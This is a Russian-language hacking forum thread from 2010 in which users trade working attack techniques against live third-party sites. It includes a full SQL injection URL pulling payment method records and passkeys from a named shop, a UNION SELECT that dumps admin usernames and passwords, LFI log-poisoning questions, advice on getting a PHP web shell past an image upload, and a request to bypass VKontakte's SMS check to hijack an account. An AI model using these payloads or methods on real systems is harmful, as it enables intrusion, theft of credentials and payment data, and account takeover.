02.05.2010, 11:25
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами:
8633638
Репутация:
0
|
|
Вопрос по LFI.
Какие есть пути к логам и где их можно посмотреть?
Вот путь
, через него я выполнил пхп команду, а где можно посмотреть под разные сервера? |
|
|
02.05.2010, 12:39
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами:
9509918
Репутация:
30
|
|
a1ertso
http://forum.antichat.ru/thread49775.html
|
|
|
|
02.05.2010, 14:29
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
4:1:PayPals_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country
а это что?
|
|
|
|
02.05.2010, 15:16
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от pinch
4:1:PayPals_paypal:5:0.00:0:0.00:0.00:0:PP:P:0:Y ::country
а это что?
http://ethanol.li/techtab.php?id=-157+union+select+concat_ws(0x3a,payment_method_id,
vendor_id,
payment_method_name,
payment_class,
shopper_group_id,
payment_method_discount,
payment_method_discount_is_percent,
payment_method_discount_max_amount,
payment_method_discount_min_amount,
list_order,
payment_method_code,
enable_processor,
is_creditcard,
payment_enabled,
accepted_creditcards,
payment_extrainfo,
payment_passkey),2,3,4+from+ilseboc_joom.jos_vm_pa yment_method+limit+3,1+--+&uri=/products.php?id=157&lang=fr
|
|
|
|
02.05.2010, 15:21
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
я не понимаю... что те именно раскрутить? кажется ты уже все раскрутил
|
|
|
|
02.05.2010, 20:21
|
|
Новичок
Регистрация: 24.04.2010
Сообщений: 2
С нами:
8447307
Репутация:
0
|
|
Здравствуйте!
Добыл мыло и хотел бы выслать на него пароль от "вконтакте" но не так все просто как казалось бы, от меня соц. сеть требует ввести номер телефона введенного при регестрации пользователем "вконтакте" и получит на этот номер код для смены пароля.
Вопрос:как можно обойти смс и выслать пароль на почту?
Взарание спс...
|
|
|
|
02.05.2010, 22:29
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
при заливке шелла в админке вот что мне вылетело:
Код:
Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128
шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ? |
|
|
|
02.05.2010, 23:26
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от daniel_1024
при заливке шелла в админке вот что мне вылетело:
Код:
Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128
шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ? во-первых, загрузить корректный jpg(png,bmp,gif по вкусу) с кодом php-шелла - если расширение .php не меняется, ты смог это обойти или другой способ... то будет шелл.
во-вторых, судя по ошибкам - там картинки пережимаются скриптом, так что все пхп-теги и код будет утерян. Шелла не видать тебе.
|
|
|
|
02.05.2010, 23:27
|
|
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
С нами:
8556372
Репутация:
127
|
|
Сообщение от daniel_1024
при заливке шелла в админке вот что мне вылетело:
Код:
Warning: imagesx(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: imagesy(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: imagecopyresampled(): supplied argument is not a valid Image resource in /admin/kategorie.php on line 253
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 122
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 123
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 124
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 125
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 126
Warning: Cannot modify header information - headers already sent by (output started at /admin/kategorie.php:253) in /admin/config.inc.php on line 128
шелл не загрузился. есть ли какой-нибудь способ обхитрить php в это случае ? Оно как бе пытается ресайзнуть картинку, но не получается, shell.php.jpg пробовал?
|
|
|
|
02.05.2010, 23:43
|
|
Новичок
Регистрация: 27.03.2009
Сообщений: 11
С нами:
9012765
Репутация:
1
|
|
делаю запрос:
http://test.ru/news.php?s=news_date%20DESC&v=0&newscat_id=-1+UNION%20SELECT%20concat(username,0x3a,password), 2,3+from+admins
ответ:
Error: Illegal mix of collations for operation 'UNION'
File: /var/www/test.ru/htdocs/news.php
Line: 69
Query: SELECT newscat_id, newscat_title, newscat_dependency FROM newscats WHERE newscat_id=-1 UNION SELECT concat(username,0x3a,password),2,3 from admins LIMIT 1
Как я понимаю, это из-за кодировки. Как подправить запрос? Кодировка utf8
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
